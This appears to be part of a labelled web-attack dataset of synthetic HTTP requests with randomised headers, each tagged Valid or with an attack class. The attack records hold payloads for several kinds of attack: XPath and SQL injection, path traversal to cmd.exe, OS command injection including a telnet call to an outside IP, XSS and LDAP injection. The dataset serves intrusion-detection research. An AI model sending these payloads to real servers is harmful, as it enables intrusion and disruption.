Host: 210.177.74.164
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-hebrew, windows-1254;q=0.1
Accept-Encoding: compress;q=0.6
Accept-Language: *
Cache-Control: min-fresh=541
Client-ip: 171.196.246.32
Cookie: .xrmFfDN=595613;8hg5eyos=ie+;Gq09insert9m=?oee;pn0peter=sw;i5a=3tdrb o;qUPK1YxtermxmlJVxD=27125
Cookie2: $Version="443"
Date: Fri, 07 Aug 09 14:47:42 CET
ETag: "4fBtkGnN1iC7-i7nSOa"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Wed, 02 Dec 09 06:57:32 GMT
If-Unmodified-Since: Sun, 18 Jan 04 14:52:44 GMT
If-Match: *
If-None-Match: *
If-Range: "ZIy1-ItIGO9EtetC3."
Max-Forwards: 50
MIME-Version: 8.3
Pragma: iDd=nealnnea
Proxy-Authorization: Digest nc=a68EDdAa
Authorization: qolhw rtei=entcei
Range: -6815,05-
Referer: http://S9wgb.fr/gedatb/etomunhh/w2encraa/hudteU.tar
TE: chunked
Trailer: Expect
User-Agent: Mozilla/9.9 (X11; U; SunOS sun4u 9.4; 74-Fu; rv:0.0.1) Gecko/08822167
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6070x723
Via: 2.2 98.217.253.217
Transfer-Encoding: Oddi
Upgrade: 3tDr/0.3, octa/6.4
Warning: 004 www.i7gBe.tiff "ie1rvnye5ht" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 55136594
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19413
Start - Id: 49480
class: XPathInjection
GET /nS/ermoeEdia/tOlY6de3.Ya.msf?FRwPrj=eX3&h0=nlV8aie%27+++or+++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++++i++%2B+j+%2B+k++++%2B+++l++%2B++++1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%27vpSlod%27%3D++++%27+qse%27+++or&bodtmpolzsm=ofo&vtvvAln4c=nmhLB13ZYpxu&fe0cercra=55&o9ge2=5s&O3T2=+2ae&h10bsRtt=ddTHtCmZ&kjMwHYuMJ=aXNK2cJ6NH&9It6wt8lro=47 HTTP/1.1
Host: www.nidehxL4i6.cz
Connection: etXE
Accept: text/*, video/quicktime
Accept-Charset: hz-gb-2312
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 39.79.55.113
Cookie: 0s6r=0600;en8tNkmE=513868;NurieoutnIcl=yeMCNr3t4a;5u10hatena=tc;oao0OSw=14910;2d8aaneoado=919787
Cookie2: $Version="297"
Date: Mon, 11 Jan 10 23:11:54 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Sun, 05 Dec 04 01:05:08 GMT
If-Unmodified-Since: Thu, 25 Mar 04 09:08:43 CET
If-Match: "kurkjzZ@4Dyqf.@H_B"
If-None-Match: *
If-Range: "yotgDv37yDFL6jWk"
Max-Forwards: 9
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic aXR1cTpoZHNyNw==
Authorization: NTLM ZWk1cWNlc2V1ZGUxYTFlRXRhbFVvb2RhNHVkbmVzSmJ0M3Zsag==
Range: -012
Referer: /sbntoey/lye95mte.css
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (compatible; Konqueror/7.7; Open BSD i386; t1wmiktE)
UA-CPU: Sparc
UA-Disp: 198,205,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: bia54t/7.1 www.feJLtpr6.jpeg
Transfer-Encoding: compress
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49480
Start - Id: 17055
class: Valid
GET /ozdCi6dfMls.mspx?ofaul4nmwEi6=6ahalN2d&raoEch=513&igri1sg=69&70BEuUJ0=15172 HTTP/1.0
Host: 163.121.156.136
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932;q=0.8, iso-8859-15;q=0.2, ks_c_5601-1987;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 160.69.131.126
Cookie: ei7d49eh4n=kNpLlKiR3
Cookie2: $Version="309"
Date: Sun, 22 May 05 03:55:01 GMT
ETag: W/"bPLfPIaTYGq7m-KxD"
Expect: xdteh=6eeNeiwl
From: mbgys@xehcas.biz
If-Modified-Since: Sat, 08 Jul 06 05:49:15 UTC
If-Unmodified-Since: Mon, 06 Dec 04 17:09:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic aHZzaGRuaU46cndvdGFk
Authorization: NTLM aUFlckJoNW91cGhsZ3FhY3I0Zm9vMzBySm1sdGVwaXNTdw==
Range: 561-,-66
Referer: /ioassu/iiant.msf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.8 (Windows; U; Win98 9.1; l9-fy; rv:8.3.0) Gecko/45551146
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: HTTP/1.6 90.87.190.39, 9.5 225.150.220.151:9567
Transfer-Encoding: identity
Upgrade: eus/7.5
Warning: 757 www.w9iHjV.js:93937 "hanNpr578i" 
X-Forwarded-For: 185.99.110.242
X-Serial-Number: 7467351348661149329
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17055
Start - Id: 20728
class: Valid
GET /as4Q/Mvbscript-T.html?c9erjo0tmei=4&rbodytrQbP=6122&xEo=Dl%40s&fg=systemonarm%2Blog%28UpTno56eDni&UyYt1RQ3bE1u=7&n6att=n-amtrtpxks8m&yg=kiRxmeUamuRlmai&eo=iTXs%5C&awna5cfteI=6752&4eBAeT=erEeCY24_I&eeis7A4ceaco=88900194&dRl0WsiO=irb2kJMcOy&grlM9Ps4H=5og%25&cntefntdd=esimfqls HTTP/1.1
Host: www.iuui.be
Connection: close
Accept: application/x-tar;q=0.4, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: AEfxN-h7tuu, nmhPet-agiuy, bi-eug;q=0.8, iupf1iyi-tatSon;q=0.1
Cache-Control: oo=cglqiraa
Client-ip: 173.194.244.159
Cookie: redTBntd=63
Cookie2: $Version="0"
Date: Sun, 22 Apr 07 02:09:09 GMT
ETag: "1DgOo2vdxETCOqChv"
Expect: 100-continue
From: tTTe@nmxntnq.uk
If-Modified-Since: Thu, 09 Apr 09 10:34:25 GMT
If-Unmodified-Since: Sat, 02 Apr 05 05:44:10 GMT
If-Match: "MEL3YmmqUjS6DzDii"
If-None-Match: "sSM93xRvP9@XP.kv"
If-Range: Sat, 29 Mar 08 24:27:26 GMT
Max-Forwards: 28
MIME-Version: 1.8
Pragma: p=eOu9o3u
Proxy-Authorization: Digest nc=ce10aCbC
Authorization: Basic bzZ0bDY6dWFsaWVybnc=
Range: 161725-433276,-8,-97
Referer: /ataaoe.swf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/7.7 (compatible; Konqueror/3.5; Open BSD i386; e5nbotvtce)
UA-CPU: MIPS
UA-Disp: 8501,806,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: 0.7 144.31.190.113, 3.1 232.168.112.139
Transfer-Encoding: weio; r1igb=a7eoz
Upgrade: ciuSw/6.9, Weep/3.5, 1twnnO/9.3
Warning: 447 156.37.10.161 "oa0itiorbaoej2" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20728
Start - Id: 8181
class: Valid
GET /a2k9/8oqUDRM5pga1yAXndmz/aX5_Ry/7thndnivshbotOH/@TP.susrCbx16/oPFy2@xUlVX.4/iaqlrs.tiff?dmhnytibslrndwb=scriptrtaRboot.inii5+w7ice8&srkMJnetcatRlIt=rigreplace1Por-htwvz&tcaNsenrfuNaA0s=uinshutdownd&tahdwI=58708226&awvdsaea=4 HTTP/1.0
Host: 125.191.67.199
Connection: keep-alive
Accept: image/png;q=0.2, video/quicktime
Accept-Charset: x-mac-chinesetrad, windows-1252;q=0.2, x-mac-chinesesimp
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 110.38.97.95
Cookie: asm=eeh53tynunbemilLu;dnla=shutdown rme3locationdXli;almetrheuoex=Anauado&;4tIrLvme=am3;v5hVTYeAh-uT=d>nieIiti;PpasswdVR6=shx1
Cookie2: $Version="52"
Date: Mon, 06 Sep 04 16:29:57 UTC
ETag: "CJ2FHvY_yVxe4mme"
Expect: 100-continue
From: lncsrs1@ssri.net
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Sat, 28 Mar 09 24:26:54 UTC
If-Match: "Te7XzoO2aKnqHqJ1qwsM"
If-None-Match: *
If-Range: "b8GLjyVIWsFJCdO59"
Max-Forwards: 416
MIME-Version: 9.9
Pragma: tdqaeto=4atd1eek
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: NTLM YWRhYW1FcGhwdHNyUWR0b1AzOGVhbjN0dGFmZW9sclR0b29vcWx0c2NycmFhdGU=
Range: -635
Referer: http://namoSm.uk/tm9h37mn.txt
TE: gzip,gzip;q=0.0
Trailer: If-Range
User-Agent: d5quve9oPoGat3mig
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 7.0 www.gmehjlol.jpg
Transfer-Encoding: identity
Upgrade: nas/1.0, rc6/4.9, dtmas/3.2, uIcq/4.7, essls/9.6
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 143.171.199.183
X-Serial-Number: 81045574594520616
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8181
Start - Id: 9215
class: Valid
GET /ssncaRhsn9/adtmeiwlI/iV_3loODyHXwUoAftFdJ/wrShDE/dPavIon/ruRh__u/lnidqHqXdpxkTOu/l6zwjWTyyVjqLG4/xCrspgqPPQPP90X_b0ao/tFyZs8-K5eBCzN.sh?P4n14Copen.Up=741384&w0ddfnmEvt=fEnouw1&zniTFnxn8l=tDyA4wamr7oettt2 HTTP/1.0
Host: www.3houiioS.uk
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, compress, identity, identity;q=0.8, compress;q=0.7
Accept-Language: yRl-n;q=0.1, 3gcds-arNfui, mosf-a5edeb;q=0.1
Cache-Control: only-if-cached
Client-ip: 63.252.193.129
Cookie: oewyenac=l770=nw
Cookie2: $Version="676"
Date: Tue, 24 Feb 09 11:03:30 GMT
ETag: W/"qugN-.6L1GW2fTrO3w"
Expect: 100-continue
From: enjtcitc@et92Icoot.com
If-Modified-Since: Sun, 15 Jun 08 17:17:57 CET
If-Unmodified-Since: Sat, 16 May 09 22:42:17 CET
If-Match: "pcF7ZGdL3mxpvQ8"
If-None-Match: *
If-Range: "yclKV_9IEHzUqpUdGp2"
Max-Forwards: 83
MIME-Version: 3.1
Pragma: hraaa0so='wVscna'
Proxy-Authorization: Basic c3BpZUVsOkRuS2lzaXU=
Authorization: fhaHu Tesz=Z1uoh
Range: 7-,506-547400,2408-38770
Referer: /ihTie/kwp3L/itnr9ody.rar
TE: deflate;q=0.4
Trailer: If-Match
User-Agent: Mozilla/1.7 (X11; U; SunOS sun4u 8.2; 0a-la; rv:9.5.3) Gecko/97078181
UA-CPU: Sparc
UA-Disp: 5248,9403,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 113x871
Via: 0.1 www.8eto.gif:45042
Transfer-Encoding: deflate
Upgrade: g62e/6.8, t6dret/4.6, 0fdou/6.5
Warning: 386 22.153.125.167 "t5eh" "Thu, 23 Jun 05 10:04:46 GMT"
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 6194472934474
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 9215
Start - Id: 43738
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 159.91.155.34:345
Connection: i9bbeeM
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 42.85.153.5
Cookie: atoe=86497;en50tera=rtttometa+g;irleRsia=fatnfoenyatl1;irm=reM5CV4vfK;e7qilM8xs1r2s=sroi%utdmh;3us15oan8=fcetosycu2asn
Cookie2: $Version="25"
Date: Fri, 25 Nov 05 03:25:11 GMT
ETag: W/"MJRYeoM9MNrdpNUXW"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Wed, 22 Aug 07 20:35:44 GMT
If-Unmodified-Since: Fri, 09 Sep 05 02:51:57 GMT
If-Match: "5Ca07Mlw.icw.VCsV"
If-None-Match: "QP8pNWSyUctvnX7Q6"
If-Range: *
Max-Forwards: 680
MIME-Version: 0.1
Pragma: t='t'
Proxy-Authorization: rguud skwsaiq=hCtyg
Authorization: Basic amVyYWNSOnV0ZWg=
Range: 69038-00
Referer: /rlve/TbsaE/fncgew.mdb
TE: chunked;q=0.7,deflate;q=0.8,trailers
Trailer: Accept-Language
User-Agent: idtoht/9.8.9.4
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: 5.7 42.114.199.231, Erns/0.5 www.dfee4d.htm, 2.8 www.yo3t.tiff
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43738
Start - Id: 20026
class: Valid
GET /sQz9/cmfrehS.php4?cn01ot=e6Mtbrc HTTP/1.1
Host: 138.52.119.244
Connection: atArNtho
Accept: image/*, image/jpeg, audio/*;q=0.1
Accept-Charset: cp-932;q=0.1, iso-8859-8, x-mac-chinesetrad, koi8;q=0.7
Accept-Encoding: *
Accept-Language: e-sa, de-s;q=0.6, hnd6yis-Ftlta;q=0.4, nrhgnekr-aamo0e, o-Renaeln
Cache-Control: max-stale
Client-ip: 30.88.191.125
Cookie: ee=n5iyee;oqsa=2050658065;vok=rxEh;msymtrhshnc9El=&nEwoad:drop;5tecuhinrgbc=879351329
Cookie2: $Version="5"
Date: Thu, 17 Nov 05 16:05:19 CET
ETag: W/"hb3K6rPvSU6q_38b"
Expect: 100-continue
From: fiyrdNy@miRwaddr.cz
If-Modified-Since: Thu, 04 Oct 07 17:43:35 CET
If-Unmodified-Since: Mon, 15 Dec 08 15:28:42 UTC
If-Match: "OGYQd_I-wAkBsSZXtOt"
If-None-Match: *
If-Range: "x7vBihiGHe6@ELgRk-08"
Max-Forwards: 6323
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic ZWRlbDphbjJuZWVlaQ==
Authorization: Basic U3RuRnBvb3U6N29uYXRk
Range: -9850,-091367
Referer: http://www.Sidiwr.net/oontrmhn/1epsDc.swf
TE: deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/8.5 (compatible; Konqueror/4.2; Solaris; hAz9ve)
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6883x9445
Via: T7i/2.9 www.Gtypd.html
Transfer-Encoding: gzip
Upgrade: Lcfa/2.8, Eiwet/9.0
Warning: 933 www.eoio.png:16177 "hIirthSs" "Tue, 06 Feb 07 23:19:23 CET"
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20026
Start - Id: 41355
class: SqlInjection
GET /NpsKaglK_XMj10a/edYeaenefejE1Lie4tq/nepEnnhnhsv/faieKo1virut/qH/qIU0U7VrA/n5n_OBZ0Lr.cfm?sSnaexeLem=385588&etn=c&lyutla=lwTGFK.2&jemeonaoewtna7t=45879&cG_85j.Tt=820373059 HTTP/1.1
Host: www.add1jnatE.org:6
Connection: keep-alive
Accept: text/*, image/gif, video/mpeg
Accept-Encoding: identity, compress, deflate;q=0.5
Cookie: sa=';   shutdown--;wgqhrooq=17;rhttsn=>6N
From: r5Tdtem@sciresis.org
If-Unmodified-Since: Sun, 18 Feb 07 13:12:56 CET
Max-Forwards: 30
Pragma: eDetlci=en2
Authorization: NTLM YW5valRhZmFkTGlleXJzYWl0bndTZXdlSWllYWZvYW1lRGhlb3BybnVldA==
Range: -425,1526-,0877-
Referer: /5eNes/e7ine/re6i4El.jsp
User-Agent: Mozilla/1.7 (X11; U; Unix 3.7; tu-2e; rv:1.5.3) Gecko/37676337

null

End - Id: 41355
Start - Id: 31277
class: Valid
GET /aVdVZjxptTJvfDyM/V0sX/sbi@Em/gqdO3cVwWr.html? HTTP/1.1
Host: 132.228.71.167
Connection: pmnwh
Accept: */*
Accept-Charset: iso-8859-9;q=0.8, windows-1254, x-mac-cyrillic, windows-874;q=0.9, us-ascii;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 94.93.194.223
Cookie: tlsdtlltxit4=uaqahlrtebvtrtSiru;eulefReFElmeani=?t
Cookie2: $Version="98"
Date: Thu, 14 Aug 08 10:38:51 GMT
ETag: "Gscpz.g0HmvES8SSd"
Expect: qddeh=sdiabmt;loHserrr
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Mon, 02 Aug 04 22:18:19 GMT
If-Unmodified-Since: Sun, 17 Apr 05 07:41:36 GMT
If-Match: *
If-None-Match: "zaY0Tpaf0g7pSmM"
If-Range: Mon, 12 Mar 07 11:10:58 GMT
Max-Forwards: 482
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Digest nonce
Range: 019-,893-4434
Referer: http://www.eiaezg0.biz/edlRHtoe/aRt9s/zafg.bin
TE: trailers,trailers
Trailer: TE
User-Agent: c7oicsuy
UA-CPU: 68000
UA-Disp: 5325,2370,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3795x126
Via: HTTP/6.3 75.23.57.15:241, FTP/9.5 113.170.91.4, HTTP/1.2 39.180.95.118
Transfer-Encoding: wcnaah
Upgrade: aAscr/3.2, igtw/7.1, csA/1.1
Warning: 691 www.OGbt0T.css "udswuftuhm" 
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31277
Start - Id: 44009
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: www.cttiesusto.biz:7322
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.6
Accept-Encoding: *
Accept-Language: Rotre-ciAntgsR
Cache-Control: only-if-cached
Client-ip: 139.195.201.34
Cookie: oh5l3Sewh=w5eeC9mbmx;t4ucnttat=44670420;thndnsh=Rgi;dtngiSie3ekCsee=aie;imiw=7385380
Cookie2: $Version="1"
Date: Sat, 01 Jul 06 16:43:09 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: kp4tiinn=evwnas
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Wed, 05 Dec 07 21:48:32 CET
If-Match: "@Ks4l7ofmyY2aScABGMH"
If-None-Match: "VVIGK7vBJo1AjeJ4vM9"
If-Range: *
Max-Forwards: 7229
MIME-Version: 9.9
Pragma: Pagnot=zgmeo7rn
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: ivn1d wIdh9ti=ee5z
Range: 67-764741,470518-20,3-202913
Referer: http://www.iheeu.fr/wyrdbo/mcahxri/lemIn1/entteasx.txt
TE: chunked;q=0.4,gzip;q=0.2,trailers
Trailer: Host
User-Agent: 8ecin/5.3
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: identity
Upgrade: eeek/4.8, annk1/4.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44009
Start - Id: 47430
class: XSS
GET /oeiDos2oFauangAd/aenOoiqysgdeaEo/eKsho8XxDYVOx2/97CQIt43Jd52mBYd.htm?ao5qaotdeAHao=093&1NG2lscriptq=782507245&i261noa=yCzWHg6Ve&uie=35577670&deeHneo6zCoit=%3Cscript++++%3Ealert%28wssxa.lajpe%29%3C%2Fscript+%3E&homeX51Ot=16&nSussics2uew8s=+dn&as=dI_oq&TrttEhe0lyI=02&LobjectifrxB00M=7141194 HTTP/1.1
Host: 15.95.30.214:81637
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 180.21.73.41
Cookie: aife8ohhfc=50558
Cookie2: $Version="05"
Date: Fri, 17 Apr 09 08:09:03 GMT
ETag: "QkPnsGdJe177PaIh12u"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Sat, 09 Dec 06 24:36:53 GMT
If-Match: *
If-None-Match: "3eCfif6oUVuHRsE"
If-Range: Mon, 25 Jan 10 06:50:33 UTC
Max-Forwards: 561
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: Basic YXQ5c2VwdDpycWxkQXpJdA==
Range: 264348-7,043051-,50446-892
Referer: /ohtm9/usitf.nsf
TE: chunked
Trailer: Referer
User-Agent: eaznhOhaty (rZ.ehm1x; tuIfkid.@; aon1m5b)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 5.1 www.asey6o.jpeg, 8.0 www.Oantu.gif
Transfer-Encoding: gzip
Upgrade: 26e/0.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47430
Start - Id: 36938
class: LdapInjection
POST /eO67X2UeOyuIY-9jt.cfm? HTTP/1.0
Content-Length: 155
Content-Language: sodz,e,nrilns
Content-Encoding: identity
Content-Location: http://www.akttMy.uk/aCceOa/82irt/otatNT.swf
Content-MD5: bmV1bnQyaG45b3JyaXRuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Feb 06 10:43:12 CET
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: www.OseigpgE.com
Connection: dirhc
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 162.69.97.25
Cookie: 9mstr98jTnodmdr=nKat rcpO;zuf4wny5gBpepy=?3Sinh;rahirpsrulqset=5347749;EWBA1QxUxJv=9s;8ttsaw5rei=089
Cookie2: $Version="76"
Date: Fri, 06 Feb 04 11:19:44 GMT
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 17 Apr 07 21:06:11 UTC
If-Unmodified-Since: Fri, 13 Aug 04 23:34:59 UTC
If-Match: "Dk07Hk.Msl2S8Wbl"
If-None-Match: *
If-Range: Tue, 18 Aug 09 05:49:50 CET
Max-Forwards: 8212
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: seuwi5 ehaono9=LEtah6
Authorization: Basic MnJqbm50djpucDJpZHNzZQ==
Range: 21-,49196-
Referer: http://www.mhaselz.net/xuaui85/8eeaco/teylaeid.pdf
TE: chunked,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.7 (X11; U; Unix 1.3; rE-8T; rv:1.1.3) Gecko/55540887
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 3.6 www.xA9pday.htm, 9.3 55.246.11.155, 3.7 www.ifhiae.jpg
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sfny=)   (   |    (displayName=had*)  (name =  had*)(  mail=had*    )&veddleutF3=iaf&iELHbih=33413&sicfrh9e5m=76&t0Nfpo48e=25774454

End - Id: 36938
Start - Id: 43238
class: OsCommanding
GET /7D3.MI/5mB.9viwMuNXxB_f/O3-Ay.Z.pl?rshsaEbeEgAGehs=%22+++++%3B+++++telnet++++115.86.168.38+++++80++++%3B HTTP/1.1
Host: www.itThf.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw;q=0.8
Accept-Encoding: *
Accept-Language: hweaml-3ti6ir;q=0.8, tmSe-mktaw4kg;q=0.4, nrorAs-s5ioa;q=0.8, 5e4af-Tree
Cache-Control: no-store
Client-ip: 36.211.14.62
Cookie: netefh=tedsele;AEPQZ3a7b4SH=ogDfaAWX@;cmN9nlannohrr=e>;uih1nte=sa 3f06nm >ro pL\apositioninsert;j3o=417608;ooqax2r15llife=rd3ledpm\tn
Cookie2: $Version="086"
Date: Mon, 14 Feb 05 02:18:42 UTC
ETag: "7vRs2CO.Rsi0wa-sA5q"
Expect: ioiitno=sbij
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Sat, 20 Mar 10 20:27:51 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 75
MIME-Version: 7.1
Pragma: t1=pnthant
Proxy-Authorization: Digest uri=/abtstebu/h4felsd/o370lht/etxsert/rdgGE.asp
Authorization: xta4e coetilod=pcyr2o
Range: -330,06836-
Referer: /Ts3Bgnds/os3u89tn/71enpx5a/beeie.html
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: kyewhmGcha6
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: FTP/3.7 4.96.247.82, HTTP/8.9 www.2xxAl.html, esikn/8.8 www.to6hea.tiff
Transfer-Encoding: deflate
Upgrade: nbUlro/5.5, yfi/5.9, islxmt/9.6, tmL/9.7
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43238
Start - Id: 5525
class: Valid
PUT /1dc.d.KPqA1dII@rD7A/hZm0lJFGwHEJux2LK/qtpz2nLetlAfeaty/t4ydl./lIzi5VrXKWtH.dll? HTTP/1.1
Content-Length: 218
Content-Language: excngh
Content-Encoding: gzip
Content-Location: /tti5of/eeeve/ylstg2/cb8Itxc/tia8TSt.asp
Content-MD5: amVpbWN0cndhaHJub2lzaw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jul 09 05:05:49 GMT
Last-Modified: Wed, 08 Mar 06 21:16:44 GMT
Host: 237.197.170.26
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: compress;q=0.3, gzip;q=0.8, identity;q=0.1, gzip, identity;q=0.7
Accept-Language: *
Cache-Control: max-age=452
Client-ip: 19.114.67.195
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="6"
Date: Thu, 06 May 04 07:36:48 GMT
ETag: "V_qErrkrpRelawPe-"
Expect: 100-continue
From: 6lhfnze@anRoaAa.it
If-Modified-Since: Mon, 18 Apr 05 21:35:57 GMT
If-Unmodified-Since: Wed, 24 Nov 04 09:26:30 UTC
If-Match: "S8eQbwfebtWDH-IBP4tQ"
If-None-Match: *
If-Range: Thu, 06 Sep 07 14:16:28 UTC
Max-Forwards: 2
MIME-Version: 4.0
Pragma: isgkerj=oit
Proxy-Authorization: NTLM aWY2c0hsbmFzcjUyYXJhZHRlaWV5azVydGVydEVBdGVnYXJhY2VlM3R0
Authorization: Basic TG56ODoyZ2R0ZWJl
Range: 88833-,356615-47,5006-
Referer: /Lgti.gif
TE: chunked,chunked;q=0.4
Trailer: Proxy-Authorization
